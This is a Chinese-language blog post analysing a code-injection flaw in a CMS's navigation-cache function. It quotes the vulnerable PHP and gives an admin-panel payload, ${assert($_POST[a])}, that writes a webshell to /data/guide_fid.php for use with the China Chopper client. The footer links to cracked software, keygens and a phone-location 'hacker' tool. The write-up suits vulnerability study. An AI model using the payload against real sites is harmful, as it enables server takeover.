- 软件
0x01 漏洞分析
此漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。
漏洞出现在:inc/class.inc.php中的GuideFidCache函数里
/*导航条缓存*/
function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){
global $db,$webdb,$pre;
if($table=="{$pre}sort"&&$webdb[sortNUM]>500){
return ;
}
$show="<?php \r\n";
//$showindex="<a href='javascript:guide_link(0);' class='guide_menu'>>首页</a>";
$showindex="<a href='\$webdb[www_url]' class='guide_menu'>>首页</a>";
$query=$db->query("SELECT fid,name FROM $table ");
// 带双引号写入变量,并且未过滤。
while( @extract($db->fetch_array($query)) ){
$show.="\$GuideFid[$fid]=\"$showindex".$this->SortFather($table,$fid)."\";\r\n";
}
$show.=$shows.'?>';
if($TruePath==1){
write_file($filename,$show);
}else{
write_file(ROOT_PATH."data/$filename",$show);
}
}
这个函数主要是将导航条信息写入缓存文件guide_fid.php文件中,但是写入变量使用双引号,因此可以直接构造变量远程执行代码,比如${phpinfo()}。
写入文件成功后,就可以直接访问该文件即可。
0x02 漏洞利用
漏洞利用更为简单,登陆后台增加栏目为${assert($_POST[a])},后门直接写入/data/guide_fid.php文件中,菜刀连之即可。
WinNTSetupv4.1.0中文版
勒索软件WannaRen突然开始在国内爆发 主流安全软件无法成功拦截
主动管理和关闭微信朋友圈以及腾讯其他产品中出现的个性化推荐广告
通过注册表解决谷歌浏览器将JPG格式图片保存为JFIF格式的问题
如何用手机指纹识别来远程解锁Windows10如何用手机指纹识别来远程解锁Windows10
使用U盘装机提示无法打开所需文件D : \ Sources \ install.wim 的解决办法使用U盘装机提示无法打开所需文件D : \ Sources \ install.wim 的解决办法
主要网站安全检测工具,网站被挂马怎么办?
快手官方解封神器,一键快速解封快手账号安全文章
“黑客教父”郭盛华被警方抓捕 涉嫌非法利用信息网络罪被刑拘安全新闻
福昕pdf编辑器(附激活码)图像处理
最新电影电视可用m3u8直播源【2018-5-15更新m3u8直播源】破解资源
黑客定位技术-黑客定位手机号查询精准物理位置找人安全新闻
餐饮管家收银管理2.2.0下载其它行业
最新BarTender2020注册机下载扫描打印
谷歌访问助手chrome插件上网辅助
迅捷视频转换器免费(附注册码)格式转换
琼ICP备2021004244号-1